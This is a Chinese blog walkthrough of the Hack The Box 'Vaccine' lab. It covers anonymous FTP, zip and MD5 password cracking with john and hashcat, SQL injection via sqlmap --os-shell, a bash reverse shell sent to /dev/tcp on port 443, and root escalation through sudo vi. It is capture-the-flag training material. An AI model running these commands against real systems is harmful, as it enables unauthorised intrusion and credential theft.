Hack The Box 之 10 Vaccine

最新推荐文章于 2023-11-14 17:33:34 发布
最新推荐文章于 2023-11-14 17:33:34 发布
阅读量565 收藏
点赞数 3
分类专栏: Hack The Box 文章标签: 哈希算法 安全 https
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angelxiqi/article/details/124591553
版权

在这里插入图片描述

填空

第一题 在这里插入图片描述
第二题 在这里插入图片描述
第三题在这里插入图片描述

第四题 在这里插入图片描述

第五题 在这里插入图片描述

第六题 在这里插入图片描述

第七题 在这里插入图片描述

第八题
在这里插入图片描述

第九题

在这里插入图片描述

开始操作

直接nmap先跑起来

nmap -v -sS -sV -sC 10.129.4.78

在这里插入图片描述
根据返回结果,发现ftp为230

魔鬼小细节 FTP =230代表可以匿名访问

So
在这里插入图片描述
直接把backup.zip拖到桌面
在这里插入图片描述解压文件,发现文件加密了
在这里插入图片描述
接下来对文件进行爆破

zip2john backup.zip > hash

用zip2john将backup.zip生成hash值并存为文件hash.txt

在这里插入图片描述
然后对生成的hash文件进行破解

john hash

在这里插入图片描述
得到解压密码hash为 741852963

unzip backup.zip

unzip解压backup文件,得到 index.php和style.css
catindex.php得到

在这里插入图片描述
cat index.php
发现查看 index.php 发现存在 admin账户以及其密码的MD5值
2cb42f8734ea607eefed3b70af13bbd3

接下来使用hashcat来碰撞MD5

echo'2cb42f8734ea607eefed3b70af13bbd3' > hash2

将MD5存入hash2
然后进入/usr/share/wordlists下将rockyou.txt.gz文件解压

在这里插入图片描述
接着调用hashcat命令

hashcat -a 0 -m 0 hash2 /usr/share/wordlists/rockyou.txt

在这里插入图片描述

┌──(root💀kali)-[~/桌面]
└─# hashcat -a 0 -m  0 hash2 /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 4800H with Radeon Graphics, 5814/5878 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.                                                    
If you want to switch to optimized backend kernels, append -O to your commandline.                                                                            
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache building /usr/share/wordlists/rockyou.txt: 33553434 bytes (23.Dictionary cache building /usr/share/wordlists/rockyou.txt: 100660302 bytes (71Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

**2cb42f8734ea607eefed3b70af13bbd3:qwerty789**       
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started.....: Thu May  5 16:40:18 2022 (0 secs)
Time.Estimated...: Thu May  5 16:40:18 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1216.3 kH/s (0.88ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 102400/14344385 (0.71%)
Rejected.........: 0/102400 (0.00%)
Restore.Point....: 98304/14344385 (0.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Dominic1 -> birth

Started: Thu May  5 16:40:14 2022
Stopped: Thu May  5 16:40:19 2022

最后撞出MD5 2cb42f8734ea607eefed3b70af13bbd3:qwerty789

在这里插入图片描述使用admin / qwerty789登录账号
在这里插入图片描述简单浏览一下,发现有一个搜索框,随便输入1
在这里插入图片描述感觉有搞头
在搜索框随便写内容,然后点击搜索时候使用burp抓包,右键保存文件为sql.txt
在这里插入图片描述

注意 这里一定要点击搜索时候使用burp抓包,截取的信息存为SQL文件(不然抓取的sqlmap跑不出结果来)

运行sqlmap -l sql.txt在这里插入图片描述

结果

发现确实存在SQL注入漏洞,且数据库为postgresql数据库,我们继续使用**–os-shell**获取到shell

在这里插入图片描述

sqlmap -l sql.txt --os-shell

在这里插入图片描述在这里插入图片描述
当出现os-shell就代表成功了
我们将打开 443 端口上的 netcat 侦听器
在这里插入图片描述
虽然我们得到了shell,但是,它不是很稳定和交互。 为了使其更加稳定,我们将使用
以下有效载荷:
执行payload 远端在os-shell中执行

 bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"

在这里插入图片描述

cd ~
ls
cat user.txt

在这里插入图片描述
成功获得用户flag
接着来到网站目录/var/www/html查看一下有什么文件
我们得到了立足点。 但我们将快速使我们的 shell 完全交互
查看一下dashboard.php,
我们在这个文件里面发现了连接数据库的账号postgres和密码P@5w0rd!,经过测试这个正是当前该系统的用户名和密码。

提权

请注意,shell 可能会突然死掉,而不是重新进行漏洞利用,我们将使用 SSH 登录
ssh postgres@10.129.74.24 
P@s5w0rd!

在这里插入图片描述
我们将输入 sudo -l 来查看我们有什么权限
在这里插入图片描述
所以我们有 sudo 权限通过运行 sudo /bin/vi 使用 vi 编辑 pg_hba.conf 文件
/etc/postgresql/11/main/pg_hba.conf 。 我们将去 GTFOBins 看看我们是否可以滥用这个特权:
在这里插入图片描述
我们无法执行以下命令,因为 sudo 仅限于 /bin/vi
/etc/postgresql/11/main/pg_hba.conf 。
根据 GTFOBins,还有另一种方法:

vi
:set shell=/bin/sh
:shell

在这里插入图片描述
再然后`

:shell

在这里插入图片描述

回车键后回成功发现提取成功

whoami  //查看权限

所以我们也会这样做
在这里插入图片描述
提权成功
进入/root目录下,查看root.txt可以获得root的flag:
dd6e058e814260bc70e9bbdef2715849

A4n9g7e2l
关注
专栏目录
[渗透测试学习] Vaccine - HackTheBox
rev1ve的博客
12-05 256
问题:John the Ripper工具集附带了什么脚本,并以允许破解尝试的格式从受密码保护的zip档案中生成哈希?问题:此服务可以配置为允许使用特定用户名的任何密码登录。解压zip时发现有加密,运用工具破解加密的zip中生成哈希。拿到密码解压zip后,在index.php找到MD5加密的。问题:除了SSH和HTTP,这个盒子上还托管了什么服务?利用刚刚得到的密码登录,发现能用的有一个配置文件。问题:通过此服务下载的文件的名称是什么?问题:网站上管理员用户的密码是什么?退出后再次进入配置的文件,直接输入。
Hack The Box - STARTING POINT
小小郭的博客
03-06 2467
Hack The Box - STARTING POINT
Hack the box vaccine
qq_41696858的博客
07-03 269
上一台靶机的线索FTP账号 ftpuser/mc@F1l3ZilL4 1.日常nmap -sC -sV 10.10.10.46,开放21,22,80端口 2.结合上一台靶机拿到的FTP账号,密码,登录FTP服务器,dir看到backup.zip,拿到备份文件 3.解密,用kali里面的john 先用zip2john backup.zip>hash //生成hash值,解密效率更高 john hash --fork=4 -w /usr/share/wordlists/rockyou.txt 2&gt
HackTheBox-Vaccine
LYJ20010728的博客
07-27 773
HackTheBox-Vaccine连接配置信息搜集登录FTP破解压缩包密码获取登录密码登录网站getshell升级shell提权 连接配置 参考之前写的连接配置,文章链接 信息搜集 使用nmap对场景给出的ip地址进行扫描 nmap -sS -A 10.10.10.46 发现其开放了21、22和80端口,利用上一场景得到的FTP用户凭据 ftpuser/mc@F1l3ZilL4,尝试登陆FTP服务 登录FTP ftp 10.10.10.46 Name:ftpuser Password:m
HackTheBox - Vaccine
qq_45862635的博客
06-17 958
Hack The Box :: Starting Point - Tier2 - Vaccine
hack the box靶场Vaccine靶机
zr1213159840的博客
03-23 3291
开启,看第一题: 问:除了跑了ssh和http服务,还有什么服务? 回答:ftp,使用nmap扫描,能看到结果 nmap -sV -Pn 10.129.95.174 第二个问题: 问:有一个服务时可以匿名登录的,用户名是什么? 回答:anonymous。下意识猜测是ftp服务可以匿名登录,直接在文件管理中使用ftp登录,看到以下结果,然后可以登录,确信是anonymous 并且其中包含一个backup.zip文件,直接下载下来,肯定和后面的题目相关。 说曹操曹操到,第三问 问:可以下载的文件
Hack The Box : Starting Point - Vaccine
qq_60201815的博客
09-13 693
攻击机:kali-linux 靶机:Oopsie --------------------------------------------------------------------------------------------------------------------------------- 网络配置:操作与Archetype靶机相同,链接:Hack The Box : Starting Point - Archetype_丶 Chave的博客-CSDN博客 渗透过程 已知目标
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 2050
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
The Anti-Vaxxer Vaccine-crx插件
04-03
语言:English (United States) 抗vaxxer疫苗是第一个数字疫苗,旨在在线对抗抗缅婆婆婆的传播。 抗vaxxerism几乎只有疫苗。 但它从未像今天那样毒力和危险,导致疫苗接种率下降,疾病爆发和死亡。...
hack the box vaccine 靶场练习
鸥鹭忘机
08-01 1861
收集信息 连接hack the box服务器后第一步依然是扫描靶机。 nmap -sV -sS -F 10.10.10.46 -sV 代表扫描端口和开放的服务信息 -sS 代表用TCP半开式扫描 -F 快速扫描,扫描常用的端口 发现开放了80,21等端口。我们用上一个靶机获取到的账号和密码来连接一下这个ftp服务器,并查看一下有哪一些文件。 ftp 10.10.10.46 //然后更具提示输入账号和密码 ls 发现了一个backup.zip,把它下载下来并解压。 如果被防火墙拦截则可以开启被
HackTheBox-Starting Point--Tier 2---Vaccine
最新发布
七天
11-14 222
输出显示 postgres用户权限下,可以使用sudo权限编辑pg_hba.conf文件。2.FTP允许匿名登录,发现backup.zip。6.访问80端口,admin:qwerty789登录。7.搜索接口使用$searc变量,尝试对其进行注入。4.编辑pg_hba.conf获取shell。3.使用john解密backup.zip。4.backup.zip文件信息泄漏。爆破hash密码,得到密码是。,查看index.php,发现。参数获取一个shell。8.获取反弹shell。
0x03-HackTheBox-Shield
0pr
04-22 544
Shield Video Walkthrough!???? 个人博客地址 Via今天回来继续 HackTheBox 系列。有事耽误了两天。前两天发现 Vaccine 这个机器老是会出现网络问题,我就跳过不做了。那么今天就是 Shield。 目标机器在IP地址 10.10.10.29。 Recon Nmap 只有 80 和 3306 端口开着,一个网站,加一个 mysql server。 攻击者可以继...
Hackthebox - Previse 靶场实战
路西菲尔的故事汇
08-09 2003
Hackthebox - Previse 靶场实战 靶场信息 靶场类型 信息搜集 使用nmap进行端口扫描 ┌──(root????root)-[~/Desktop] └─# nmap -A -sS -sC -sV -p- 10.10.11.104 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 22:27 CST Nmap scan report for 10.10.11.104 Host is up (0.25s latency). No
HTB打靶(Active Directory 101 Active)
qq_18811919的博客
12-30 1264
HackTheBox Active Directory 101 Active
HTB打靶(Active Directory 101 Forest)
qq_18811919的博客
12-25 1328
HackTheBox Active Directory 101 Forest
RACTF 2021 Web复现
feng的博客
08-19 1588
前言 最近向Y4师傅学习,慢慢开始打国外的比赛。13号-16号的RACTF当时看了一下做出来人数最多的Web题,发现一点头绪都没有,就直接爬了,感觉这个比赛可能难度挺大的。还是有些畏难了。今天早上看到Y4师傅发了这个比赛的WP,我又去官网上看了一下,部分的Web的WP也发了,而且题目环境也都没关,所以就又去做了一下,不会的Web题如果有wp的话也跟着wp学习了一下进行了复现。 Really Awesome Monitoring Dashboard 用的是Grafana v8.1.1,查了一下没找到这个版本的
Hack The Box -----------------------Active
大方子
12-16 6986
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
hashcat 破解RAR密码操作使用记录
airlike的专栏
11-13 9640
hashcat 世界上最快最先进的密码破解工具,使用方法记录
opssl php rsa_id0-rsa WP 合集
weixin_42300400的博客
01-12 7044
id0-rsa WP 合集忙里偷闲做做题 wwwwwwwwwwwwwIntrotoHashinghttps://id0-rsa.pub/problem/18/Introto PGP https://id0-rsa.pub/problem/19/HelloPGP https://id0-rsa.pub/problem/1/HelloOpenSSLhttps://id0-rsa.pub/problem...
install.packages("covid19vaccine") Warning in install.packages : package ‘covid19vaccine’ is not available for this version of R A version of this package for your version of R might be available elsewhere, see the ideas at怎么回事
06-12
这个错误提示意味着你正在尝试安装的R包"covid19vaccine"可能不适用于你当前的R版本。你可以尝试以下解决方法: 1. 检查你的R版本是否是最新的版本,如果不是,更新到最新版本。 2. 在CRAN...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

A4n9g7e2l

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值